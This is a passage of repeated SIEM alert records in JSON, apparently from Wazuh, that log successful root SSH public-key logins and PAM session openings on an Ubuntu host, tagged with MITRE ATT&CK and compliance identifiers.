Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA 